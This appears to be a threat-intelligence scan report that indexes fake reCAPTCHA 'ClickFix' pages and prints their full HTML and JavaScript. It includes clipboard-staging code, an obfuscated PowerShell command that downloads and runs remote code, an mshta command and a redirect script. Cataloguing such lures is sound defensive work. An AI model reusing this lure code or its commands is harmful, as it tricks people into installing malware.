"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
http://101.32.40.22/
Total findings: 4
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "http://101.32.40.22/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/"
],
"ClipboardCommands": "mshta ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n }\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n font-family: Roboto, helvetica, arial, sans-serif;\n opacity: 0;\n position: absolute;\n visibility: hidden;\n margin: auto;\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n }\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">\u5b8c\u6210\u8fd9\u4e9b</span>\n <span class=\"verify-header-text-big m-p block\">\u9a8c\u8bc1\u6b65\u9aa4</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n \u4e3a\u4e86\u66f4\u597d\u7684\u8bc1\u660e\u60a8\u4e0d\u662f\u673a\u5668\u4eba\uff0c\u8bf7:\n </p>\n <ol>\n <li>\n \u6309\u4f4fWindows\u952e <i class=\"fab fa-windows\"></i> + <b>R</b>\u3002\n </li>\n \n <li>\n \u5728\u9a8c\u8bc1\u7a97\u53e3\u4e2d\uff0c\u6309 <b>Ctrl</b> + <b>V</b>\u3002\n </li>\n\n <li>\n \u6309\u4e0b\u952e\u76d8\u4e0a\u7684 <b>Enter</b> \u952e\u5b8c\u6210\u3002\n </li>\n </ol>\n <p>\n \u60a8\u5c06\u9075\u5b88\u5e76\u540c\u610f:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n \u6267\u884c\u4e0a\u8ff0\u6b65\u9aa4\u5373\u53ef\u5b8c\u6210\u9a8c\u8bc1\u3002\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">\u9a8c\u8bc1</button>\n </footer>\n </div> \n </div>\n\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = window.location.origin + \"/recaptcha-verify\";\n const commandToRun = \"mshta \" + htaPath\n stageClipboard(commandToRun, verification_id)\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://staplebrokenmetaliyro.blogspot.com/
Total findings: 46
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://staplebrokenmetaliyro.blogspot.com/",
"URLs": [
"http://www.w3.org/1999/xhtml",
"http://www.google.com/2005/gml/b",
"http://www.google.com/2005/gml/data",
"http://www.google.com/2005/gml/expr",
"https://electricreport.org/ygd4g",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss",
"https://www.blogger.com/feeds/3967763303726818370/posts/default",
"https://www.blogger.com/profile/02686294779557843862",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogblog.com/indie/mspin_black_large.svg",
"https://www.blogblog.com/indie/mspin_white_large.svg",
"https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw",
"http://www.offset.com/photos/394244",
"https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js",
"http://www.w3.org/1999/xlink",
"http://www.w3.org/1999/xlink",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://www.blogger.com",
"http://www.w3.org/1999/xlink",
"http://www.offset.com/photos/394244",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/go/report-abuse",
"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js",
"https://www.blogger.com/static/v1/widgets/4071838938-widgets.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://www.blogger.com",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22",
"https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22",
"https://www.blogger.com/profile/02686294779557843862\\x22",
"https://apis.google.com/js/platform.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogger.com/static/v1/jsbin/2820493333-lbx.js",
"https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css"
],
"SuspiciousKeywords": [
"<script>",
"\\x3d",
"\\x3c",
"\\x22",
"\\x3e",
"\\x27",
"display:none"
],
"ClipboardManipulation": "...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...",
"CaptchaElements": [
"ch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeF",
"Header1', 'header', document.getElementById('Header1'), {}, 'displayModeF",
"log1', 'page_body', document.getElementById('Blog1'), {'cmtInteractions",
"sts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeF",
"bution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeF",
"e1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeF",
", 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeF",
"5/gml/expr'> <head> <script> let linkNam",
"dio:not([controls]){display:none;height:0}[hidden],t",
"0}[hidden],template{display:none}a{background:transp",
"eak-word } .hidden{ display:none } .invisible{ visib",
"} input::-ms-clear{ display:none } .blogger-logo,.sv",
"mobile_video_class{ display:none } .bg-photo{ backgr",
".show-more.hidden{ display:none } .inline-ad{ displ",
":none } .inline-ad{ display:none; max-width:100%; ov",
"} } .item-control{ display:none } #comments{ border",
"read .thread-count{ display:none } #comments .commen",
"] p.comment-footer{ display:none } #comment-editor-s",
"comment-editor-src{ display:none } .comments .commen",
"ed-top-placeholder{ display:none } .collapsed-header",
"eader .replaced h1{ display:none } .centered-top-con",
"ader-image-wrapper{ display:none } .centered-top-con",
"ible>:not(summary){ display:none } .collapsible[open",
"kit-details-marker{ display:none } .collapsible-titl",
"itle .chevron-down{ display:none } .flat-button{ cur",
"ow-popup li.hidden{ display:none } .pill-button{ bac",
"x:101 } .search h3{ display:none } .search form{ dis",
"x } .search form>*{ display:none } .search.focused f",
"search-input label{ display:none } .centered-top-pla",
"search-expand-text{ display:none } .search-close{ di",
"ng .sharing-button{ display:none } .widget.Sharing .",
"ng-buttons li span{ display:none } .post-share-butto",
"are-buttons.hidden{ display:none } .sharing-button{",
"tainer .navigation{ display:none } } .dialog{ box-sh",
".FollowByEmail h3{ display:none } .subscribe-popup",
".bg-photo-overlay{ display:none } body#layout .page",
"layout .navigation{ display:none } body#layout .side",
"ody#layout .search{ display:none } .centered-top-con",
"ff; cursor:pointer; display:none; height:48px; margi",
".sticky .Header p{ display:none } .sticky .PageList",
".sticky .PageList{ display:none } .search-focused>*",
"t-holder .continue{ display:none } #comment-editor{",
".widget.Profile h2{ display:none } .widget.Profile h",
".sidebar_top:empty{ display:none } .sidebar-containe",
"p_wrapper.no-items{ display:none } } .post-snippet.s",
"l-ad-container ins{ display:none } .page_body.has-ve",
"} .hamburger-menu{ display:none } body.collapsed-he"
],
"HTML": "<!DOCTYPE html>\n<html dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>\n<head>\n<script>\n let linkName = \"https://electricreport.org/ygd4g\"\n let strGET = window.location.search.replace( '?', '');\n location.replace(linkName + \"?\" + strGET)\n </script>\n<meta content='width=device-width, initial-scale=1' name='viewport'/>\n<title>staplebrokenmetal</title>\n<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>\n<!-- Chrome, Firefox OS and Opera -->\n<meta content='#eeeeee' name='theme-color'/>\n<!-- Windows Phone -->\n<meta content='#eeeeee' name='msapplication-navbutton-color'/>\n<meta content='blogger' name='generator'/>\n<link href='https://staplebrokenmetaliyro.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>\n<link 